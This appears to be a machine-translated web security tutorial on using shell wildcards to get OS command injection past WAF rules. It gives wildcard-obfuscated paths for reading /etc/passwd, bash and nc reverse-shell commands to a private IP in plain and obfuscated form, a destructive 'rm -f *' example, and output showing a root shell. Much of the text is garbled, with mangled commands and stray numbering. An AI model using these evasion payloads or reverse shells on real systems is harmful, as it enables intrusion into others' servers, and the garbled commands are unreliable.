The fifth chapter of Web security--about using wildcard characters for OS command injection around WAF

First, the introduction of wildcard characters:

In general, the wildcard contains * and?, are English symbols, * used to match any arbitrary character,? to match an arbitrary character.

For example, using wildcards to view files, you can see that the punch-in file is/etc/resolv.conf:

1 sudo Head -5 /??? /R???? V.c?? F 2 # 3 # MacOS Notice 4 # 5 file  for hostname resolution, Address 6 # Resolution, or the DNS query routing mechanism used by most

Similarly, when deleting a file, delete all files that begin with a:

1 RM -F *

Here's a brief explanation of what a wildcard is.

Second, a shell that supports wildcard characters

As can be seen from the above, the Linux, Unix-like operating system command line for parameters or command values are wildcard characters, the name command itself supports wildcards?

1└─[$]>sudo/??? /c?t/??? /R???? V.? O?F2 #3 # MacOS Notice4 #5# thisfileis not consulted forDnshostnameresolution, Address6 # Resolution, or the DNS query routing mechanism used by most7 # Processes on the this system.8 #9 # to-View the DNS configuration used by this system, use:Ten# Scutil--DNS One # A # See ALSO -# DNS-SD (1), Scutil (8) - # the# thisfileis automatically generated. -#

As you can see, the command is partially identified/??? /c?t =/bin/cat

Third, WAF rule set:

The WAF engine-based set of rules for detection and response (release or blocking) of the payload part

For example, payload filtering for OS Command injection:

Rule1 Filter | (%7c) Character & URL encoding%26 even/(%2f) and so on, filter back quotes '

Rule2 filter command keyword and so on

Rule3-a regular expression match

Four, around the WAF

1, found/ETC/PASSWD, will alarm,/??? /P???? D is not, because the matching regular is likely to write the match/[\w]{1,}/[\w]{1,} for Rule3

2. Give a bash simple command to bounce the shell, which is appropriate for Rule2

// normal Bounce shell commands #bash-i >&/dev/tcp/192.168. 1. 102/44440> &1#/??? /b?? H-i >&/dev/tcp/192.168. 1. 102/44440>&1 can be successful 

In testing an example of a direct bounce using NC:

1 #正常情况下: 2 192.168. 1.101 4444 3 4444 -l-v

can be converted into:

1 192.168. 1.101 4444 2 # I have a NL command here/bin, so N can't get out, otherwise you can use n? To replace the NC, and the IP address can be converted to a long integer

Results

 1  [********@***]# nc-p 4444 -L-v  2  ncat:version  6.40  (Http:// nmap.org/ncat)  3  ncat:listening on::: 4444  4  ncat:listening on 0.0 . 0.0 : 4444  5  ncat:connection from ******.  6  ncat:connection from ******:43568   7  whoami  8  Root 

It's done.

In conclusion, this method is still very useful.

The fifth chapter of Web security--about using wildcard characters for OS command injection around WAF